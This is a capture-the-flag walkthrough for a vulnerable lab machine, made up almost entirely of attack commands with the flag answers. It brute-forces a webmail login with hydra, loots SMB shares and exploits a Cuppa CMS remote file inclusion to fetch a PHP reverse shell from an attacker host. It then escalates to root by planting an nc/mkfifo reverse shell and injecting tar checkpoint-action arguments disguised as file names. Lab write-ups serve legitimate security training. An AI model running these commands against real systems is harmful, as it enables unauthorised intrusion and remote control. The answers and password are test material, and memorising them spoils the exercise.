[Task 1] Deploy and compromise the vulnerable machine!

nmap -sV -sC 10.10.185.215
http://10.10.185.215/
dirb http://10.10.185.215
smbclient -L 10.10.185.215
smbclient //10.10.185.215/anonymous
smb: \> ls
smb: \> cd logs
smb: \logs\> ls
smb: \logs\> get log1.txt
cat log1.txt
http://10.10.185.215/squirrelmail/src/login.php
hydra -l milesdyson -P log1.txt 10.10.185.215 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."

#1 What is Miles password for his emails?

cyborg007haloterminator
smbclient //10.10.185.215/milesdyson -U milesdyson
smb: \> cd notes
smb: \notes\> get important.txt
cat important.txt
http://10.10.185.215/45kra24zxs28v3yd/

#2 What is the hidden directory?

/45kra24zxs28v3yddirb http://10.10.185.215/45kra24zxs28v3yd
http://10.10.185.215/45kra24zxs28v3yd/administrator/
searchsploit cuppa
cat 25971.txt

#3 What is the vulnerability called when you can include a remote file for malicious purposes?

remote file inclusion

php-reverse-shell.php

curl http://10.10.185.215/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.3.38:8081/php-reverse-shell.php
nc -nlvp 4445
python -c 'import pty;pty.spawn("/bin/bash")'

#4 What is the user flag?

cat /home/milesdyson/user.txt

Privilege Escalation

cat /etc/crontab
cat /home/milesdyson/backups/backup.sh
cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.3.38 4443 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
nc -nlvp 4443

#5 What is the root flag?

cat /root/root.txt